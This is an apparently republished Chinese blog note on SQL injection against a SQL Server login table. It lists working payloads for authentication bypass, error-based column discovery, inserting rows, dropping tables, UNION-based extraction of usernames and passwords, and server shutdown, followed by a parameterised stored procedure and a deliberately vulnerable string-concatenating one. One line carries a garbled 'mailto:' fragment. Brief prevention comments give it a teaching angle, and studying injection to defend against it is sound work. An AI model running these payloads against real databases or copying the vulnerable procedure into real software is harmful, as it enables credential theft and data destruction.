zoukankan      html  css  js  c++  java
  • SQL注入攻击<收藏>

    -SQL注入攻击
    --以任何用户登入(预防:采用参数形式)
    select * from  dbo.userinfo where userName='' and userPwd=''or 1=1--'
    select * from  dbo.userinfo where userName=''or 1=1--'
    --查看除VINET外所有信息
    select * from  dbo.userinfo where userID='VINET' OR 1=1
    --利用已知会员名登入
    select * from  dbo.userinfo where userName='admin '--'
    --利用错误一步步获取信息(预防:自定义错误提示页面)
    select * from  dbo.userinfo where userName=''HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName,UserPwd HAVING 1=1--'
    --根据上面错误信息所得数据向表插入数据(成功!)
    select * from  dbo.userinfo where userName='';INSERT INTO userinfo Values('hacker','hacker')--'
    --破坏性删除表
    select * from  dbo.userinfo where userName='';drop table dbo.Hello--'
    --逐步获取用户账户信息
    select * from  dbo.userinfo where userName=''UNION SELECT 'abc',1,1 FROM userinfo --' --检查类型
    select * from  dbo.userinfo where userName=''UNION SELECT 1,1,1 FROM userinfo --' 获取标题字段
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,1 FROM userinfo WHERE UserName>'a'--' --取得所有账户名
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,userPwd FROM userinfo where UserName>'a'--' --获取账户密码信息

    --停止服务(权限足够) (;DROP Database D_Name --、 ;DROP TABLE T_Name --)
    select * from  dbo.userinfo where userName='' ;SHUTDOWN--'
    --


    exec dbo.SafeQueryCustomers 'l','l'
    exec dbo.SafeQueryCustomers2 'l','' or 1=1 --'

    CREATE PROCEDURE dbo.SafeQueryCustomers
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''
       
        IF NOT @userName IS NULL 
        BEGIN
           SET @WK = @WK + ' userName LIKE @puserName AND  '
           SET @userName = '%' +@userName + '%'
        END  
       
        IF NOT @userPwd IS NULL    
        BEGIN
           SET @WK = @WK + ' userPwd LIKE @puserPwd AND  '
           SET @userPwd = '%' +@userPwd + '%'
        END  
        IF LEN(@STR) > 0
        BEGIN
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           exec sp_executesql @STR,
    mailto:N%27@puserName nvarchar(30),@puserPwd nvarchar(12)',
    @puserName=@userName,@puserPwd=@userPwd
        End  
        ELSE
           exec sp_executesql @STR
    =============================================

    CREATE PROCEDURE dbo.SafeQueryCustomers2
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''
       
        IF NOT @userName IS NULL 
        BEGIN
           SET @WK = @WK + ' userName LIKE ''%' +@userName + '%'' AND  ' 
        END  
       
        IF NOT @userPwd IS NULL    
        BEGIN
           SET @WK = @WK + ' userPwd LIKE ''%' +@userPwd + '%'' AND  '
          
        END  
         IF LEN(@STR) > 0
        BEGIN
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           exec sp_executesql @STR
        End  
        ELSE
           exec sp_executesql @STR


  • 相关阅读:
    代码收藏
    sql语句收藏
    网站收藏
    Api代码收集
    [网络收集]html 一个属性,多个数据
    [转] C#自定义的字符串操作增强类
    WebBrowser记录
    [转载]用C#的GDI+技术生成复杂型彩色验证码
    js addEventListener attachEvent用法
    正则表达式 获取常见所有标点符号
  • 原文地址:https://www.cnblogs.com/Golf9527/p/1558711.html
Copyright © 2011-2022 走看看